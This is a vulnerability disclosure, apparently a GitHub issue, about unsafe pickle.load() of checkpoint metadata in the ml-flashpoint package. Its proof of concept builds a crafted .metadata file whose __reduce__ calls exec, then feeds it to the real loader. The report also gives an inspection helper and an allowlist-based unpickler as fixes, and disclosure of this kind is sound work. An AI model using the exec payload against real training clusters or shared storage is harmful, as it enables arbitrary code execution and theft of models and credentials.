[Security Vulnerability] Insecure Pickle Deserialization in Checkpoint Metadata Loading ml-flashpoint #74

## Summary

`DefaultMLFlashpointCheckpointLoader.read_metadata()` in `src/ml_flashpoint/core/checkpoint_loader.py` uses `pickle.load()` to deserialize `.metadata` files from checkpoint directories. These files can originate from untrusted peer nodes in a distributed training cluster (via `ReplicationManager.sync_bulk_retrieve`) or from shared storage. An attacker who controls a peer node or can write to shared checkpoint storage can craft a malicious pickle payload that achieves arbitrary code execution on any node that loads the checkpoint metadata.

## Description

- **Type:** Insecure Deserialization (CWE-502)
- **Source:** `.metadata` files read from `Path(checkpoint_id.data) / object_name` (line 152). In distributed deployments, these files arrive via `sync_bulk_retrieve` from peer nodes over the network, or from shared filesystem storage accessible to multiple nodes.
- **Sink:** `pickle.load(f)` at lines 154-155 of `checkpoint_loader.py`. No validation, allowlisting, or sandboxing is applied to the deserialized data.
- **Impact:** Arbitrary code execution with the privileges of the ML training process. An attacker can exfiltrate model weights, training data, credentials, or pivot to other systems in the cluster. In multi-tenant or federated training scenarios, a single compromised or malicious participant can compromise all other nodes.
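
Validating the object returned by `pickle.load()` would not be sufficient on its own, because the callable stored in the pickle runs during loading, before any check on the result can happen. The following is a minimal sketch of that ordering. The `Demo` class and the `os.mkdir` marker are illustrative stand-ins for attacker-controlled code and are not part of ml-flashpoint.

```python
import os
import pickle
import tempfile

# Benign stand-in for attacker code: creating a directory is an observable side effect.
marker = os.path.join(tempfile.mkdtemp(), "side_effect_marker")


class Demo:
    def __reduce__(self):
        # pickle stores "call os.mkdir(marker)" instead of the object's state.
        return (os.mkdir, (marker,))


blob = pickle.dumps(Demo())

ran_before_load = os.path.isdir(marker)  # nothing has executed yet
result = pickle.loads(blob)              # os.mkdir(marker) executes here
ran_after_load = os.path.isdir(marker)

# A post-hoc type check rejects the result, but only after the call has already happened.
rejected = not isinstance(result, dict)
```

Any fix therefore has to act before or during deserialization, not after it.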

### Attack Vectors

1. **Malicious peer node:** In a distributed training cluster, `_try_retrieve_object_if_missing()` calls `sync_bulk_retrieve()` to fetch checkpoint objects from peer nodes. A compromised peer can serve a crafted `.metadata` pickle payload. When any other node calls `read_metadata()` (triggered by `_compute_retrieval_plan()` or `get_latest_complete_checkpoint()`), the malicious pickle executes arbitrary code.

2. **Shared storage poisoning:** In shared-storage deployments, an attacker with write access to the checkpoint directory can replace or inject a malicious `.metadata` file. Any node loading that checkpoint will execute the payload.

## Affected

- **Package:** `ml-flashpoint` (pip)
- **Repository:** [google/ml-flashpoint](https://github.com/google/ml-flashpoint)
- **File:** `src/ml_flashpoint/core/checkpoint_loader.py`
- **Function:** `DefaultMLFlashpointCheckpointLoader.read_metadata()` (lines 147-158)
- **Versions:** All versions (as of commit on main branch)

## References

- [Python pickle documentation - Security Warning](https://docs.python.org/3/library/pickle.html#restricting-globals)
- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)

## PoC

A proof-of-concept demonstrates arbitrary code execution by crafting a malicious `.metadata` pickle file that writes a marker file when deserialized.

**payload.py** — generates a malicious `.metadata` file using `pickle.dump()` with a class that overrides `__reduce__` to execute arbitrary code:

```python
import os
import pickle

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
METADATA_FILE = os.path.join(CHECKPOINT_DIR, ".metadata")


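class MaliciousPayload:
    def __reduce__(self):
        # pickle calls exec(...) with this string when the file is loaded,
        # which writes pwned.txt into the current working directory.
        return (exec, ("open('pwned.txt','w').write('pwned')",))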


def generate():
    os.makedirs(CHECKPOINT_DIR, exist_ok=True)
    with open(METADATA_FILE, "wb") as f:
        pickle.dump(MaliciousPayload(), f)
    return METADATA_FILE
```

**exploit.py** — invokes the real `DefaultMLFlashpointCheckpointLoader.read_metadata()` from the built ml-flashpoint package:

```python
import os
import sys

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
sys.path.insert(0, POC_DIR)

import payload
from ml_flashpoint.core.checkpoint_id_types import CheckpointContainerId
from ml_flashpoint.core.checkpoint_loader import DefaultMLFlashpointCheckpointLoader

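# Start from a clean state so a stale marker cannot cause a false positive.
if os.path.exists("pwned.txt"):
    os.remove("pwned.txt")

payload.generate()
loader = DefaultMLFlashpointCheckpointLoader(None, None)
# Deserializing the crafted file is what triggers the payload.
loader.read_metadata(CheckpointContainerId(CHECKPOINT_DIR), ".metadata")

# The marker file exists only if the payload ran during read_metadata().
if os.path.exists("pwned.txt"):
    with open("pwned.txt") as f:
        print("EXPLOIT_SUCCESS:", f.read())
else:
    sys.exit(1)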
```

Running the exploit creates `pwned.txt`, proving arbitrary code execution via `pickle.load()` in `read_metadata()`.
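
A pickle can also be inspected without executing it. The sketch below uses the standard-library `pickletools.genops()` to list the globals a pickle would import. The helper `referenced_globals` is a hypothetical name introduced here, and its handling of `STACK_GLOBAL` is a heuristic that assumes the two preceding string opcodes hold the module and name, which is true for output of the standard pickler but not guaranteed for hand-crafted payloads. It is a triage aid, not a security control. The `Demo` class uses `print` as a benign stand-in for the `exec` call in `payload.py`.

```python
import pickle
import pickletools


def referenced_globals(data: bytes):
    """Return (module, name) pairs a pickle would import, without executing it."""
    found = []
    strings = []  # string arguments seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols carry "module name" as a single space-separated argument.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+ takes module and name from the two most recent strings.
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class Demo:
    def __reduce__(self):
        # Benign stand-in for an attacker-chosen callable.
        return (print, ("benign stand-in",))


suspicious = referenced_globals(pickle.dumps(Demo(), protocol=4))
plain = referenced_globals(pickle.dumps({"step": 10}, protocol=4))
```

A metadata file that holds only plain data yields an empty list, while the crafted one reveals the callable it would invoke.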

## Remediation

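Replace `pickle.load()` in `read_metadata()` with a deserialization method that cannot execute code, for example a data-only format such as JSON. If pickle must be kept for compatibility, restrict the globals it may resolve by overriding `Unpickler.find_class()` with a strict allowlist, and verify the integrity of `.metadata` files (for example with an HMAC) before deserializing anything received from peer nodes or shared storage.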
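
One possible mitigation, following the "Restricting Globals" section of the Python pickle documentation referenced above, is an unpickler that refuses every global outside an allowlist. This is a minimal sketch, not a patch for ml-flashpoint: `ALLOWED_GLOBALS`, `RestrictedUnpickler`, and `restricted_loads` are hypothetical names, and the single allowlist entry is a placeholder, since the types the real metadata needs are not stated in this report.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist; the real one would name only the types the metadata needs.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle tries to import.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Deserialize data, rejecting any global that is not on the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Demo:
    def __reduce__(self):
        # Benign stand-in for an attacker-chosen callable.
        return (print, ("benign stand-in for attacker code",))


plain = restricted_loads(pickle.dumps({"step": 10}))
ordered = restricted_loads(pickle.dumps(OrderedDict(step=10)))

try:
    restricted_loads(pickle.dumps(Demo()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

The allowlist should stay as small as possible, because every allowed class or function becomes something a crafted pickle is permitted to call.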

